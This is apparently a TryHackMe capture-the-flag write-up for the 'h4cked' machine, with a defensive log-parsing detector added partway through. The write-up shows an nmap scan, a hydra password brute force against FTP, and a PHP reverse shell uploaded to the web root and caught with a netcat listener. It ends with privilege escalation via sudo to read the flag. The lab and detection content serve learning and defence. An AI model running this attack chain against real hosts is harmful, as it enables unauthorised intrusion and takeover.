Hello, in this post I will walk you through the solution of the machine named “h4cked” on the TryHackMe platform. Enjoy reading…
Solution
1 — Using the Nmap tool, I gather detailed information about the open ports and services on the machine.
[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.154.37
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-07 17:55 +03
Nmap scan report for 10.10.154.37
Host is up (0.090s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.83 seconds
2 — Using the username “jenny”, I launch a password attack against the FTP service.
[root:/home/alper/Desktop/TRYHACKME]# hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.154.37
[21][ftp] host: 10.10.154.37 login: jenny password: *CENSORED*
3 — I upload a “php reverse shell” to the FTP server and trigger it from the browser.
[root:/home/alper/Desktop/TRYHACKME]# ftp 10.10.154.37
Connected to 10.10.154.37.
220 Hello FTP World!
Name (10.10.154.37:alper): jenny
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||12226|)
150 Here comes the directory listing.
-rw-r--r-- 1 1000 1000 10918 Feb 01 2021 index.html
-rwxrwxrwx 1 1000 1000 5493 Feb 01 2021 shell.php
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||17113|)
150 Ok to send data.
100% |*************************************************************************| 2354 299.71 KiB/s 00:00 ETA
226 Transfer complete.
2354 bytes sent in 00:00 (15.95 KiB/s)
ftp> exit
221 Goodbye.
[root:/home/alper/Desktop/TRYHACKME]# nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.154.37 50424
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
15:02:51 up 9 min, 0 users, load average: 0.14, 0.78, 0.65
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
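From the defender's side, steps 2 and 3 leave a clear trace in the FTP server's own log: a burst of failed logins for one user from one client, a success right after it, and then a PHP file landing in the web root. The following checker is an added example, not part of the original writeup; it runs over constructed vsftpd.log lines (the default vsftpd log format, the client addresses and the user “alice” are all assumptions, not data from the machine).

```python
import re
from collections import Counter

# Constructed vsftpd.log sample (assumption: default vsftpd log format, not
# output from the machine in the writeup). Five failures, a success, then a
# script landing in the web root; the second client ("alice") is benign.
SAMPLE_LOG = """\
Wed Jun  7 17:56:01 2023 [pid 4101] [jenny] FAIL LOGIN: Client "10.10.10.5"
Wed Jun  7 17:56:01 2023 [pid 4103] [jenny] FAIL LOGIN: Client "10.10.10.5"
Wed Jun  7 17:56:02 2023 [pid 4105] [jenny] FAIL LOGIN: Client "10.10.10.5"
Wed Jun  7 17:56:02 2023 [pid 4107] [jenny] FAIL LOGIN: Client "10.10.10.5"
Wed Jun  7 17:56:03 2023 [pid 4109] [jenny] FAIL LOGIN: Client "10.10.10.5"
Wed Jun  7 17:56:04 2023 [pid 4111] [jenny] OK LOGIN: Client "10.10.10.5"
Wed Jun  7 17:58:10 2023 [pid 4120] [jenny] OK UPLOAD: Client "10.10.10.5", "/var/www/html/shell.php", 2354 bytes, 299.71Kbyte/sec
Wed Jun  7 18:01:00 2023 [pid 4130] [alice] OK LOGIN: Client "10.10.10.9"
Wed Jun  7 18:01:30 2023 [pid 4131] [alice] OK UPLOAD: Client "10.10.10.9", "/home/alice/notes.txt", 120 bytes, 1.00Kbyte/sec
"""

# One regex covers LOGIN and UPLOAD records; the quoted path only exists for transfers.
LINE_RE = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) (?P<action>\w+): '
    r'Client "(?P<ip>[^"]+)"(?:, "(?P<path>[^"]+)")?'
)

WEB_ROOTS = ("/var/www/",)                 # directories served by Apache
SCRIPT_EXTS = (".php", ".phtml", ".phar")  # handled by mod_php if dropped there

def analyze(log_text, fail_threshold=5):
    """Return findings as (rule, client_ip, detail) tuples, in log order."""
    fails = Counter()
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        if m["action"] == "LOGIN" and m["result"] == "FAIL":
            fails[key] += 1
            if fails[key] == fail_threshold:   # report once per client/user pair
                findings.append(("ftp_bruteforce", m["ip"], m["user"]))
        elif m["action"] == "LOGIN" and m["result"] == "OK":
            if fails[key] >= fail_threshold:   # success right after a failure burst
                findings.append(("bruteforce_success", m["ip"], m["user"]))
        elif m["action"] == "UPLOAD" and m["result"] == "OK" and m["path"]:
            path = m["path"]
            if path.startswith(WEB_ROOTS) and path.lower().endswith(SCRIPT_EXTS):
                findings.append(("webroot_script_upload", m["ip"], path))
    return findings
```

The third rule only fires because the FTP user's home is the Apache document root; keeping uploads out of any directory the web server executes scripts from removes that path entirely.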
4 — After switching to the “jenny” user, I run the “sudo -l” command to see which commands I can execute with sudo privileges. Seeing that I have sudo privileges, I switch to the root user. I obtain my flag from the root directory.
$ SHELL=/bin/bash script -q /dev/null
www-data@wir3:/$ su jenny
su jenny
Password: **CENSORED**
whoami
whoami
jenny@wir3:/$ whoami
jenny
jenny@wir3:/$ sudo -l
sudo -l
[sudo] password for jenny: **CENSORED**
Matching Defaults entries for jenny on wir3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jenny may run the following commands on wir3:
(ALL : ALL) ALL
jenny@wir3:/$ sudo su
sudo su
root@wir3:/# cd /root
cd /root
root@wir3:~# ls
ls
Reptile
root@wir3:~# cd Reptile
cd Reptile
root@wir3:~/Reptile# ls
ls
configs Kconfig Makefile README.md userland
flag.txt kernel output scripts
root@wir3:~/Reptile# cat flag.txt
cat flag.txt
***CENSORED***